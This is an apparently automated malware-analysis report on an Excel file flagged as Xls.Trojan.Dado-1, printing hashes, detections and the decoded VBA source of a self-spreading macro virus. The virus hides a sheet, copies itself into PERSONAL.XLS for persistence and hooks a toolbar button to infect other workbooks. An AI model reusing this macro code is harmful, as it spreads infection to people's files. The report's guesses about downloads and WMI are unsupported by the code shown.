Xls.Trojan.Dado-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1ed80737537cb738…

MALICIOUS

Office (OLE)

32.5 KB Created: 1998-08-05 11:58:47 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ebf8c261a4de428a6ff172abd383ddff SHA-1: d95e7dd0573442ae0e7ed33de4fc87b6cc6477af SHA-256: 1ed80737537cb7386d9b6ea912e0c9432ea66eb82216a09d2798f71b7c065073
80 Risk Score

Malware Insights

Xls.Trojan.Dado-1 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1546.003 Event Triggered Execution: Windows Management Instrumentation

This Excel file contains VBA macros, identified by the 'OLE_VBA_MACROS' heuristic and the 'Xls.Trojan.Dado-1' ClamAV detection. The 'auto_abrir' subroutine within the 'macros.bas' script attempts to infect the user's Excel environment by copying itself to 'PERSONAL.XLS', likely to establish persistence. The script also attempts to hide the 'conciente' sheet and may download further payloads, though the full functionality is truncated.

Heuristics 2

  • ClamAV: Xls.Trojan.Dado-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dado-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4502 bytes
SHA-256: a71f9ec12b698988087d8bc6f8fa9eb0d0b997a7a956765a50c26b0cc36dd45b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "conciente"


Sub auto_abrir()
Attribute auto_abrir.VB_ProcData.VB_Invoke_Func = " \n14"
'Dado Error IrA terminar1
Application.ScreenUpdating = False
Application.DisplayAlerts = False
infectar
Windows("PERSONAL.XLS").Visible = False
Application.ScreenUpdating = True
Application.DisplayAlerts = True
'BarrasMenús(xlHojaCálculo).Menús("Herramientas").ElementosMenú("Macro...").Eliminar
'BarrasMenús(xlMódulo).Menús("Herramientas").ElementosMenú("Macro...").Eliminar
'BarrasMenús(xlHojaCálculo).Menús("Formato").ElementosMenú("Hoja").ElementosMenú("Mostrar...").Eliminar
'BarrasMenús(xlMódulo).Menús(2).ElementosMenú(11).ElementosMenú(3).Eliminar
'terminar1:
End Sub

Sub auto_cerrar()
Attribute auto_cerrar.VB_ProcData.VB_Invoke_Func = " \n14"
'Dado Error IrA terminar2
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Workbooks(ThisWorkbook.Name).Save
Workbooks("PERSONAL.XLS").Save
Application.ScreenUpdating = True
Application.DisplayAlerts = True
'terminar2:
End Sub

Sub infectar()
Attribute infectar.VB_ProcData.VB_Invoke_Func = " \n14"
'Dado Error IrA terminar
Application.ScreenUpdating = False
Application.DisplayAlerts = False
inst = 0
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
    If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then inst = 1
        If inst = 0 Then
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = True
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Select
            Workbooks.Add.SaveAs Filename:=Application.StartupPath + "\PERSONAL.XLS"
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = False
            GoTo cuentaventanas
        End If
        If inst = 1 Then
            Windows("PERSONAL.XLS").Visible = True
            numhper = Workbooks(ActiveWorkbook.Name).Sheets.Count
            For i = 1 To numhper
                If Workbooks("PERSONAL.XLS").Sheets(i).Name = "conciente" Then
                    inst = 2
                End If
            Next
            If inst = 1 Then
                Windows(ThisWorkbook.Name).Activate
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = True
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Select
                MsgBox (ThisWorkbook.Name)
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = False
                GoTo cuentaventanas
            Else
                GoTo cuentaventanas
            End If
        End If
cuentaventanas:
    Application.Toolbars(1).ToolbarButtons(3).OnAction = "PERSONAL.XLS!contamina"

    End If
    
Workbooks("PERSONAL.XLS").Sheets("conciente").Visible = False
Windows("PERSONAL.XLS").Visible = False
Workbooks("PERSONAL.XLS").Save
Windows(ThisWorkbook.Name).Activate

Application.ScreenUpdating = True
Application.DisplayAlerts = True
If WeekDay(Now) = 6 Then
    Application.OnTime TimeValue("16:30:00"), "vv1"
End If
'terminar:
End Sub

Sub vv1()
Attribute vv1.VB_ProcData.VB_Invoke_Func = " \n14"
MsgBox ("                ¡¡¡ GRACIAS A DIOS ES VIERNES !!! " & Chr(13) & "FAVOR DE APAGAR SU COMPUTADOR Y QUE TENGA UN BUEN FIN DE SEMANA")
End Sub

Sub contamina()
Attribute contamina.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo finish
Application.ScreenUpdating = False
Application.DisplayAlerts = False
    numhojas = ActiveWorkbook.Sheets.Count
    libact = ActiveWorkbook.Name
    For iii = 1 To numhojas
        If ActiveWorkbook.Sheets(iii).Name = "conciente" Then
            inst = 3
        End If
    Next
    If inst <> 3 Then
        Windows("PERSONAL.XLS").Visible = True
        Workbooks("PERSONAL.XLS").Sheets("conciente").Visible = True
        Workbooks(libact).Activate
        Workbooks("PERSONAL.XLS").Sheets("conciente").Copy
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.